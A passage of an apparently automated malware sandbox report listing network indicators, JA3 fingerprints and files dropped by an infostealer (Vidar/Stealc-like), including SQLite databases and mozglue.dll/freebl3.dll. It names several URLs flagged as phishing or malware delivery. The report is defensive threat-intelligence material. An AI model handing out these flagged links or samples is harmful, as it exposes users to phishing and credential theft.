                                                                                                                                                                  https://www.minstroy.saratov.gov.ru/communication/blog/admin-blg/1.php?pagen=12Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • 193.109.247.233
                                                                                                                                                                  njw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 193.109.247.229
                                                                                                                                                                  AKAMAI-ASUShttps://www.wonderlandmagazine.com/2022/02/10/kate-clover-documentary/Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.112.35.191
                                                                                                                                                                  Confidential_ New 2024 commission and agreement needs signature _ %255.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  • 23.215.0.235
                                                                                                                                                                  http://tnfarmbureau.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 23.4.224.26
                                                                                                                                                                  http://usps-pr.helprtu.top/Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • 23.215.0.174
                                                                                                                                                                  https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:6604fc88-dc7a-4ae2-989d-f98c81c5e650Get hashmaliciousRemcosBrowse
                                                                                                                                                                  • 23.215.0.48
                                                                                                                                                                  http://www.outdooradventuresinc.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.96.216.235
                                                                                                                                                                  http://woollamau.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 23.52.162.42
                                                                                                                                                                  http://woollamau.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 23.200.88.28
                                                                                                                                                                  https://ganttexcel.s3-us-west-1.amazonaws.com/Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 23.196.184.112
                                                                                                                                                                  O28gzBGj5H.svgGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 23.57.90.105
                                                                                                                                                                  HETZNER-ASDE81wq863N.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 144.76.136.153
                                                                                                                                                                  81wq863N.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 144.76.136.153
                                                                                                                                                                  aT0T5g9qvp.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                  • 49.12.172.243
                                                                                                                                                                  https://download.advanced-port-scanner.com/download/files/Advanced_Port_Scanner_2.5.3869.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 213.133.104.63
                                                                                                                                                                  https://download.advanced-port-scanner.com/download/files/Advanced_Port_Scanner_2.5.3869.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 213.133.104.63
                                                                                                                                                                  https://www.vauban-recrutement.fr/blog/emplois/transaction-manager-h-f/Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • 159.69.246.36
                                                                                                                                                                  https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 159.69.19.197
                                                                                                                                                                  http://esuper.giize.com/4KdWPP1856lOSI2nqblzfpcgp168GEHAQEXAOPNTAGQ68673BEJU278l9Get hashmaliciousPhisherBrowse
                                                                                                                                                                  • 178.63.248.54
                                                                                                                                                                  http://smoton.com/gpxnfvxv-nhuwlton-dctund7n-132s&c=E,1,GnOus4uw2lyEXKi4xzei6fra__pk0-P7SfhzjyUJKu7LFM8gCxNgwIOoMF2maIttEyAiuRrqybM6bdvq3o4uod10z0SdQIz20E-XYBUNe5zDPBfUogRt2X8esg,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • 94.130.193.196
                                                                                                                                                                  https://smoton.com/gpxnfvxv-afzwqqqr-dctund7n-173aGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 213.239.249.8

                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0ePayment_Advice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • 193.109.246.100
                                                                                                                                                                  Quotation[MPI-240401.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • 193.109.246.100
                                                                                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.8396.18973.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • 193.109.246.100
                                                                                                                                                                  https://ece894.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • 193.109.246.100
                                                                                                                                                                  SmartConvertPDF_47276935.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 193.109.246.100
                                                                                                                                                                  FM5tKs1pU4.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                  • 193.109.246.100
                                                                                                                                                                  https://www.staugustineport.com/agenda-minutes/Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • 193.109.246.100
                                                                                                                                                                  DRBS7505.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                  • 193.109.246.100
                                                                                                                                                                  http://woollamau.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 193.109.246.100
                                                                                                                                                                  POVNL-OMAN-2024-8-4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • 193.109.246.100
                                                                                                                                                                  51c64c77e60f3980eea90869b68c58a8SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 95.217.212.139
                                                                                                                                                                  UJzMs6lsyF.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 95.217.212.139
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 95.217.212.139
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 95.217.212.139
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 95.217.212.139
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 95.217.212.139
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 95.217.212.139
                                                                                                                                                                  CDssd7jEvY.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                                                                                  • 95.217.212.139
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 95.217.212.139
                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  • 95.217.212.139
                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19Util.dllGet hashmaliciousBazar Loader, LatrodectusBrowse
                                                                                                                                                                  • 104.102.129.112
                                                                                                                                                                  3FpuQAI761.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                  • 104.102.129.112
                                                                                                                                                                  Uc8jiEFesW.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                  • 104.102.129.112
                                                                                                                                                                  xv6sswE990.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                  • 104.102.129.112
                                                                                                                                                                  KA7X7R6SKW.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                  • 104.102.129.112
                                                                                                                                                                  qgceB8B0Gz.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                  • 104.102.129.112
                                                                                                                                                                  W6qa6ioGl3.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                  • 104.102.129.112
                                                                                                                                                                  X5F9Geek7L.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                  • 104.102.129.112
                                                                                                                                                                  NVZADVHptk.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                  • 104.102.129.112
                                                                                                                                                                  OO81I5RQqm.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                  • 104.102.129.112

                                                                                                                                                                  Dropped Files

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  C:\ProgramData\freebl3.dllNhTbi9P7oO.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      7POI2H21Hq.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                        PJqcq2gz5W.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                          UJzMs6lsyF.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                            TxdFaToC4b.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                              Q0G7dDD5jY.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                ENVroknEZb.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                  fw5DeeIXHG.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                      C:\ProgramData\mozglue.dllNhTbi9P7oO.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          7POI2H21Hq.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                            PJqcq2gz5W.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                              UJzMs6lsyF.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                TxdFaToC4b.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                  Q0G7dDD5jY.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                    ENVroknEZb.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                      fw5DeeIXHG.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse

                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                          C:\ProgramData\AEHIDAKECFIEBGDHJEBKKKKJKK

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\BKEBFHIJ

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\BKEBFHIJECFIDGDGCGHC

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\CBGCAFIIECBFIDHIJKFBAKEGDG

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\DGCAAFBF

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\EHCBAAAF

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\KEBGHCBAEGDHIDGCBAEC

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\KKEHIEBKJKFIEBGDGDAAECGHDH

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                                                          Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                          MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                          SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                          SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                          SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\KKJKFBKK

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\freebl3.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                          • Filename: NhTbi9P7oO.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: 7POI2H21Hq.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: PJqcq2gz5W.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: UJzMs6lsyF.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: TxdFaToC4b.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Q0G7dDD5jY.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: ENVroknEZb.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: fw5DeeIXHG.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\mozglue.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                          • Filename: NhTbi9P7oO.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: 7POI2H21Hq.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: PJqcq2gz5W.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: UJzMs6lsyF.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: TxdFaToC4b.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Q0G7dDD5jY.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: ENVroknEZb.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: fw5DeeIXHG.exe, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\msvcp140.dll

